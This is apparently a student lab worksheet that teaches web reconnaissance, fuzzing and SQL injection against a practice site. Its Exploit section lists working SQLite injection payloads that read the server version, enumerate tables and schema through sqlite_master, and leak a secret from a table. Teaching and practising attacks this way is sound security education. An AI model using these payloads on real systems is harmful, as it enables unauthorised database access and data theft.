

Notes and Lab

Your task: Evil Company Co.

Psst... Agent 142, now that you're an employee of Evil Company Co., try to exfiltrate some secrets off their website. http://live.petcs.codes/ (link). Can you find the secret code they assigned to your user?

1. Reconnaissance

Look for where vulnerabilities may occur, especially:

1. User interface (UI) forms and fields
2. HTTP headers and cookies
3. APIs
4. Files/Other local storage
5. Databases
6. Email or other kinds of messages

Once we've identified possible vulnerable locations, we'll attempt to identify the possible vulnerabilit(ies) we can carry out.

Can you make a list of all vulnerable locations?

Instructions:

1. Visit the website.
2. Take note of these 3 pages presented in the menu. Which of the following pages might be vulnerable?
   • Home /
   • Login /login
   • Sign Up /signup
3. Visit the "Sign Up" page. Right click anywhere and bring up "Inspect Element". Visit the "Network" tag and ensure "Preserve log" is checked. Locate the "Clear" button and click it.
4. Create an account, but before clicking "Sign Up", inspect the Network activity (do you know how to use the Chrome Inspector). What is happening when you create an account?
   • Can you find the HTTP POST request?
   • Where is it sending to (aka Request Url)?
   • What is the response code?
   • What data is being sent (aka Form Data)?
5. Now log in. Clear your Network data right before clicking "Login". Again, what is happening when you login?
   • Can you find the HTTP POST request?
   • Where is it sending to (aka Request Url)?
   • What is the response code?
   • What data is being sent (aka Form Data)?
6. Look at the menu. Did it change? Which of the following pages might be vulnerable?
   • Profile /profile
   • Todo /todo
   • Logout /logout
7. Create a TODO item. What is happening when you add a new TODO item? Clear your Network data right before adding a new item.
   • Can you find the HTTP POST request?
   • Where is it sending to (aka Request Url)?
   • What is the response code?
   • What data is being sent (aka Form Data)?
8. Play around and explore further. Take note of any strange behaviour.

I can now know what is being sent/received to/from the server.

2. Engage

Instructions:

1. Visit here to build your fuzzer! When you're done, come back.
2. Run the fuzzer once. What do you notice?
   • Which values caused an error?
   • Which values were marked suspicious?
   • What does a 500 Response Code error mean? (Use Google)
   • Analyse and interpret your results. What can you infer from these results? Is the server vulnerable to SQLi?
3. Now build your payload!

3. Exploit

If your account becomes slow/laggy, create a new one!

Don't worry, we will take this up together!

Some tips:

Through fuzzing, we now know that an odd number of quotes will crash the server and an even number of quotes will result in suspicious responses.

1. Try a' || 'b What do you see?
2. Try '||(SELECT 1+1)||' What is so dangerous about SELECT statements?
3. Try '||(SELECT sqlite_version())||' What version of SQLite is this server running?
4. Try '||(SELECT name FROM sqlite_master LIMIT 1 OFFSET 0)||' What is the name of the table at OFFSET 0? What other tables are present on the server? What if you change the OFFSET to 1? To 2?
5. Try '||(SELECT sql FROM sqlite_master LIMIT 1 OFFSET 0)||' What columns are present on this table? Do you see the name of this table? Try changing the OFFSET! Are there any other tables present?
6. Try '||(SELECT id from name_of_table)||' (Replace name_of_table with the name you wrote down from the previous points). Can you leak the secret now?
7. Challenge (for a prize!): What other secrets are hidden on this server?